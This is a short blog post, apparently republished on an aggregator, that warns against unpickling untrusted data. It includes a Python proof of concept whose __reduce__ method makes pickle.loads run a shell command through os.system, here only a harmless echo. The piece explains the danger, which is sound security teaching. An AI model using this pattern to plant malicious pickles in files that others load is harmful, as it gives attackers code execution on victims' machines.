This content originally appeared on DEV Community and was authored by Talles L
Here's why pickle is unsafe if you don't know the origin of the pickled data:
import pickle
import os
# Create a malicious class
class Malicious:
def __reduce__(self):
# os.system will execute the command
return (os.system, ('echo "This is malicious code!"',))
# Serialize the malicious object
malicious_data = pickle.dumps(Malicious())
# Deserialize the malicious object (this will execute the command)
pickle.loads(malicious_data)
This content originally appeared on DEV Community and was authored by Talles L
Print
Share
Comment
Cite
Upload
Translate
Updates
There are no updates yet.
Click the Upload button above to add an update.
APA
MLA
Talles L | Sciencx (2024-06-23T17:03:50+00:00) Arbitrary code execution with pickle. Retrieved from https://www.scien.cx/2024/06/23/arbitrary-code-execution-with-pickle/
" » Arbitrary code execution with pickle." Talles L | Sciencx - Sunday June 23, 2024, https://www.scien.cx/2024/06/23/arbitrary-code-execution-with-pickle/
HARVARDTalles L | Sciencx Sunday June 23, 2024 » Arbitrary code execution with pickle., viewed ,<https://www.scien.cx/2024/06/23/arbitrary-code-execution-with-pickle/>
VANCOUVERTalles L | Sciencx - » Arbitrary code execution with pickle. [Internet]. [Accessed ]. Available from: https://www.scien.cx/2024/06/23/arbitrary-code-execution-with-pickle/
CHICAGO" » Arbitrary code execution with pickle." Talles L | Sciencx - Accessed . https://www.scien.cx/2024/06/23/arbitrary-code-execution-with-pickle/
IEEE" » Arbitrary code execution with pickle." Talles L | Sciencx [Online]. Available: https://www.scien.cx/2024/06/23/arbitrary-code-execution-with-pickle/. [Accessed: ]
rf:citation » Arbitrary code execution with pickle | Talles L | Sciencx | https://www.scien.cx/2024/06/23/arbitrary-code-execution-with-pickle/ |
Please log in to upload a file.
There are no updates yet.
Click the Upload button above to add an update.